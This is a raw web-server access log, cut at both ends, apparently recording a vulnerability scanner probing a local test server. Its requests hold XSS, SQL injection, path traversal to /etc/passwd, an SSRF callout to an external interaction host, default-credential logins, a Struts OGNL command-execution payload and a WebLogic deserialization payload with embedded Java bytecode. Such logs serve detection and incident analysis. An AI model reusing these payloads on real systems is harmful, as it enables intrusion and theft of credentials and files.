Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.056","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.dockerfile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.451","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"url=https://127.0.0.1:443@c9oms3gsmpve1ijt0mc0bmpy7nkgke3x1.oast.live\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.438","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.421","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/58 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.526","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wwwctrl.cgi?action=home HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /welcome HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:11 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%0a%0dexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.541","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.337","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C\x5C..\x5C\x5C..\x5C\x5Cconfig\x5C\x5Cconfig_db.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.448","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-login.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.765","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.245","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.circleci/ssh-config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.Dockerfile HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.429","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/59 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.360","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.468","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /htaccess.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.318","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /https://%09/example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.346","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.451","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.595","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.490","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"username=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.450","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /super/login.html?lang=en HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.435","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.402","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/60 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //www.example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.317","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.735","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:12 +0000","request_body":"xxxxorg.slf4j.ext.EventData<java><void class=\x22sun.misc.BASE64Decoder\x22><void method=\x22decodeBuffer\x22 id=\x22byte_arr\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\x22org.mozilla.classfile.DefiningClassLoader\x22><void method=\x22defineClass\x22><string>ResultBaseExec</string><object idref=\x22byte_arr\x22></object><void method=\x22newInstance\x22><void method=\x22do_exec\x22 id=\x22result\x22><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\x22java.lang.Thread\x22 method=\x22currentThread\x22><void method=\x22getCurrentWork\x22 id=\x22current_work\x22><void method=\x22getClass\x22><void method=\x22getDeclaredField\x22><string>connectionHandler</string><void method=\x22setAccessible\x22><boolean>true</boolean></void><void method=\x22get\x22><object idref=\x22current_work\x22></object><void method=\x22getServletRequest\x22><void method=\x22getResponse\x22><void method=\x22getServletOutputStream\x22><void method=\x22writeStream\x22><object class=\x22weblogic.xml.util.StringInputStream\x22><object idref=\x22result\x22></object></object></void><void method=\x22flush\x22/></void><void method=\x22getWriter\x22><void method=\x22write\x22><string></string></void></void></void></void></void></void></void></void></void></java>","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST 